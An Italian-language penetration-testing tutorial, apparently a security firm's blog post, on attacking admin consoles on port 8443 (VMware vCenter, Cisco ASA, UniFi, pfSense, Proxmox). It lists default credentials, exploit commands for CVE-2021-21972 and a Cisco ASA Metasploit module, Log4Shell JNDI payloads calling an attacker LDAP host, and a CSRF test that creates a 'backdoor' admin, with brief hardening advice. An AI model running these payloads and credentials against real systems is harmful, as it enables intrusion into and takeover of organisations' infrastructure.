Porta 8443 HTTPS Pentest: vCenter, pfSense, UniFi e CVE

Porta 8443 HTTPS alternativa: VMware vCenter CVE-2021-21972, pfSense RCE, UniFi Log4Shell, Cisco ASDM default credentials, certificate intelligence e TLS hardening.
- Pubblicato il 2026-04-17
- Tempo di lettura: 5 min
La porta 8443 TCP è la versione HTTPS della 8080 — ma con una differenza importante nella pratica: mentre la 8080 ospita spesso applicazioni web generiche, la 8443 è la porta preferita per le console di gestione dell’infrastruttura. Ci trovi dentro: VMware vSphere/ESXi (gestione di tutti i server virtuali dell’azienda), Cisco ASDM (firewall e VPN), UniFi Controller (reti wireless), pfSense (firewall), Plesk/cPanel (web hosting), Kubernetes Dashboard e qualsiasi pannello admin che lo sviluppatore ha messo “sulla porta sicura”. Il paradosso è che la “porta sicura” ha il TLS ma spesso non ha nient’altro: credenziali di default, CVE non patchate e nessun WAF. Se la 8080 è la porta degli sviluppatori, la 8443 è la porta dei sysadmin — e compromettere una console di gestione infrastrutturale equivale a prendere il controllo di tutto.
1. Identificare il Servizio #
nmap -sV -p 8443 --script=ssl-cert 10.10.10.40PORT STATE SERVICE VERSION
8443/tcp open ssl/http Apache Tomcat
| ssl-cert:
| Subject: CN=vcenter.corp.internal
| Issuer: CN=VMware defaultIl certificato TLS è una miniera di informazioni. Leggi attentamente: Subject CN, Issuer, SAN (Subject Alternative Names), Organization.
# Banner HTTP
curl -sk https://10.10.10.40:8443/ -I
curl -sk https://10.10.10.40:8443/ | head -80| Indicatore | Servizio | Impatto |
|---|---|---|
CN=vcenter.* o HTML con “vSphere” | VMware vCenter | Critico — gestisce tutti i VM |
CN=esxi.* o “VMware ESXi” | VMware ESXi | Critico — hypervisor |
Server: ASDM o pagina Cisco Adaptive | Cisco ASA/ASDM | Alto — firewall/VPN |
| HTML con “UniFi” | UniFi Controller | Medio — rete wireless |
| HTML con “pfSense” | pfSense | Alto — firewall |
| HTML con “Plesk” | Plesk | Alto — hosting panel |
Server: Apache Tomcat generico | Tomcat HTTPS | Vedi porta 8080 |
Server: Kubernetes Dashboard | K8s Dashboard | Critico — vedi porta 6443 |
| HTML con “Proxmox” | Proxmox VE | Critico — hypervisor |
2. VMware vCenter / ESXi #
VMware vCenter gestisce tutti gli hypervisor ESXi dell’azienda — le macchine virtuali, gli snapshot, lo storage, la rete. Compromettere vCenter = compromettere ogni VM del datacenter.
Enumerazione #
# Versione vCenter
curl -sk https://10.10.10.40:8443/sdk/vimServiceVersions.xml
# API REST (vSphere 6.5+)
curl -sk https://10.10.10.40:8443/rest/com/vmware/cis/session -X POST \
-u "administrator@vsphere.local:VMware1!"Default credentials VMware #
| Username | Password | Contesto |
|---|---|---|
administrator@vsphere.local | VMware1! | vCenter SSO default |
root | vmware | ESXi root (vecchie versioni) |
admin | password | Appliance management |
CVE VMware (critiche e attivamente sfruttate) #
CVE-2021-21972 — vCenter RCE pre-auth (CVSS 9.8)
# Verifica
curl -sk https://10.10.10.40:8443/ui/vropspluginui/rest/services/uploadovaSe risponde 200 o 405 (non 404) → probabilmente vulnerabile. Upload di file arbitrario → webshell → RCE.
# Exploit tool
python3 CVE-2021-21972.py -t https://10.10.10.40:8443 -f webshell.jspCVE-2021-22005 — vCenter file upload RCE (CVSS 9.8)
# Verifica endpoint CEIP
curl -sk https://10.10.10.40:8443/analytics/ceip/sdkCVE-2023-34048 — vCenter out-of-bounds write (CVSS 9.8)
DCERPC protocol exploitation — pre-auth RCE sulle porte 443/8443.
# Scan automatico
nuclei -u https://10.10.10.40:8443 -tags vmwarePost-auth vCenter #
Con accesso vCenter:
- Snapshot VM → dump memoria di una VM → estrazione credenziali
- Console VM → accesso diretto al desktop di qualsiasi macchina virtuale
- Deploy OVA → crea una VM attacker nella rete interna
- Clona VM → copia una VM per analisi offline
- vMotion → sposta una VM su un ESXi sotto il tuo controllo
3. Cisco ASA / ASDM #
ASDM (Adaptive Security Device Manager) è l’interfaccia web del firewall Cisco ASA — gestisce regole firewall, VPN, NAT.
Default credentials #
| Username | Password | Note |
|---|---|---|
cisco | cisco | Il classico |
admin | admin | Alternative |
| (vuoto) | (vuoto) | Alcune versioni senza setup |
pix | cisco | Legacy PIX |
curl -sk https://10.10.10.40:8443/admin/CVE Cisco ASA #
searchsploit cisco asaCVE-2018-0101 — Cisco ASA WebVPN RCE (CVSS 10.0)
Double free vulnerability nella funzione WebVPN — pre-auth RCE sul firewall:
use exploit/linux/http/cisco_asa_webvpn_rce
set RHOSTS 10.10.10.40
set RPORT 8443
runCVE-2020-3580 — XSS persistente nella WebVPN UI — permette session hijacking dell’admin.
Con accesso ASDM:
- Leggi le regole firewall (capisci cosa è permesso e cosa no)
- Leggi la configurazione VPN (PSK, certificati, pool IP)
- Modifica le ACL per aprire porte
- Estrai credenziali VPN salvate
4. UniFi Controller #
Ubiquiti UniFi Controller gestisce access point, switch e gateway UniFi. Sulla 8443 (HTTPS) e 8080 (HTTP per device inform).
Default credentials #
# Il setup iniziale richiede di creare un account
# Ma molti lasciano: ubnt:ubnt (vecchie versioni)
curl -sk -X POST https://10.10.10.40:8443/api/login \
-H "Content-Type: application/json" \
-d '{"username":"ubnt","password":"ubnt"}'Enumerazione rete wireless #
# Con accesso admin:
curl -sk https://10.10.10.40:8443/api/s/default/stat/sta \
-H "Cookie: unifises=$SESSION_COOKIE" | python3 -m json.toolEspone: tutti i dispositivi connessi alla rete wireless (MAC, IP, hostname, traffico), SSID con password WPA, configurazione VLAN.
La password WPA è visibile in chiaro nella configurazione del wireless network → accesso diretto alla rete Wi-Fi dell’azienda.
CVE UniFi #
CVE-2021-44228 — Log4Shell
UniFi Controller 6.x usava Log4j ed era vulnerabile a Log4Shell:
# Payload nel campo username del login
curl -sk -X POST https://10.10.10.40:8443/api/login \
-H "Content-Type: application/json" \
-d '{"username":"${jndi:ldap://10.10.10.200:1389/exploit}","password":"test"}'Se il server fa una richiesta LDAP al tuo listener → vulnerabile. Usa JNDI exploit server per RCE.
5. pfSense #
pfSense è il firewall/router open source più diffuso. La web UI è sulla porta 443 o 8443.
Default credentials #
# admin:pfsense (il default universale di pfSense)
curl -sk https://10.10.10.40:8443/ \
-d "usernamefld=admin&passwordfld=pfsense&login=Sign+In"Post-auth pfSense — RCE #
pfSense ha una funzione Diagnostics → Command Prompt che esegue comandi come root:
# Via web UI o API
# Diagnostics → Command Prompt → "id"
# Output: uid=0(root) gid=0(wheel)Con accesso admin a pfSense:
- Esegui comandi come root — shell completa
- Leggi le regole firewall — capisci la rete
- Configura VPN — crea un tunnel verso di te
- Modifica DNS — redirect traffico
- Leggi credenziali VPN (OpenVPN, IPsec) in chiaro nella configurazione
CVE pfSense #
searchsploit pfsenseCVE-2022-31814 — pfBlockerNG RCE pre-auth (se il plugin è installato).
6. Proxmox VE #
Proxmox Virtual Environment è un hypervisor open source alternativo a VMware.
# Default: root:password_set_during_install
# Ma il token API a volte è debole
curl -sk https://10.10.10.40:8443/api2/json/versionCon accesso Proxmox → stesso impatto di VMware: console VM, snapshot, deploy nuove VM.
7. Certificate Intelligence — Cosa Rivela il TLS #
Su ogni servizio 8443, il certificato TLS è una fonte di intel:
# Estrai informazioni dal certificato
echo | openssl s_client -connect 10.10.10.40:8443 2>/dev/null | openssl x509 -text -noout# Oppure con Nmap
nmap -p 8443 --script=ssl-cert 10.10.10.40Cosa cercare nel certificato:
- Subject CN: hostname interno →
vcenter.corp.internal,fw-hq.corp.local - SAN: tutti gli alias del server →
DNS:vcenter.corp.internal, DNS:10.10.10.40, DNS:vc.corp.com - Issuer: CA interna → nome dell’organizzazione, presenza di ADCS
- Organization: nome legale dell’azienda
- Validità: certificato scaduto → manutenzione carente → probabilmente non patchato
# TLS quality assessment
sslscan 10.10.10.40:8443
testssl.sh https://10.10.10.40:8443Finding TLS comuni: TLS 1.0/1.1 abilitati, cipher deboli, certificato self-signed, certificato scaduto.
8. OWASP — Vulnerabilità Web Specifiche per Admin Panel HTTPS #
Le interfacce di management sulla 8443 hanno pattern di vulnerabilità ricorrenti:
Session management debole #
# Cookie senza flag Secure su HTTPS → inconsistente
curl -sk -v https://10.10.10.40:8443/login 2>&1 | grep "Set-Cookie"
# Se manca HttpOnly → XSS può rubare la sessione
# Session ID prevedibile?
# Fai 10 login e confronta i session token — se sono sequenziali → session predictionCSRF su operazioni critiche #
# Le console admin spesso non hanno protezione CSRF
# Un admin che visita una pagina malevola può:
# - Creare utenti admin
# - Modificare configurazioni
# - Eseguire comandi (se la console li supporta)
# Test: l'endpoint accetta la richiesta senza CSRF token?
curl -sk -X POST https://10.10.10.40:8443/api/users/create \
-H "Cookie: session=$ADMIN_SESSION" \
-d '{"username":"backdoor","password":"test","role":"admin"}'Default TLS configuration #
# Renegotiation insecure
openssl s_client -connect 10.10.10.40:8443 -reconnect
# BEAST, POODLE, ROBOT
testssl.sh --vulnerable https://10.10.10.40:84439. Detection & Hardening #
- Credenziali uniche e forti per ogni pannello — mai default
- MFA su tutte le console di gestione
- Certificati firmati da CA interna — non self-signed
- TLS 1.2+ only con cipher moderni (AES-GCM, ECDHE)
- IP whitelist — console raggiungibile solo da jump host
- VPN — non esporre mai VMware/Cisco/pfSense su Internet
- Patch — le CVE su pannelli di gestione sono le più sfruttate
- Audit log — ogni accesso e ogni modifica loggata
- Session timeout breve per le console admin
10. Cheat Sheet Finale #
| Azione | Comando |
|---|---|
| Nmap + cert | nmap -sV -p 8443 --script=ssl-cert target |
| Banner | curl -sk https://target:8443/ -I |
| Cert details | echo | openssl s_client -connect target:8443 2>/dev/null | openssl x509 -text |
| TLS scan | sslscan target:8443 o testssl.sh https://target:8443 |
| VMware | |
| Version | curl -sk https://target:8443/sdk/vimServiceVersions.xml |
| Default creds | administrator@vsphere.local:VMware1! |
| CVE-2021-21972 | curl -sk https://target:8443/ui/vropspluginui/rest/services/uploadova |
| Nuclei | nuclei -u https://target:8443 -tags vmware |
| Cisco ASA | admin:admin, cisco:cisco |
| UniFi | ubnt:ubnt + POST /api/login |
| Log4Shell | {"username":"${jndi:ldap://attacker:1389/}","password":"x"} |
| pfSense | admin:pfsense → Diagnostics → Command Prompt |
| Proxmox | curl -sk https://target:8443/api2/json/version |
| Searchsploit | searchsploit vmware vcenter cisco asa pfsense unifi proxmox |
Riferimento: VMware Security Advisories, Cisco ASA guides, pfSense docs, OWASP. Uso esclusivo in ambienti autorizzati. https://cyberpanel.net/blog/port-8443
Il tuo vCenter è esposto? Il firewall ha ancora la password di default? Prima che lo scopra qualcun altro: penetration test HackIta. Per diventare un professionista della security: formazione 1:1 con mentorship.







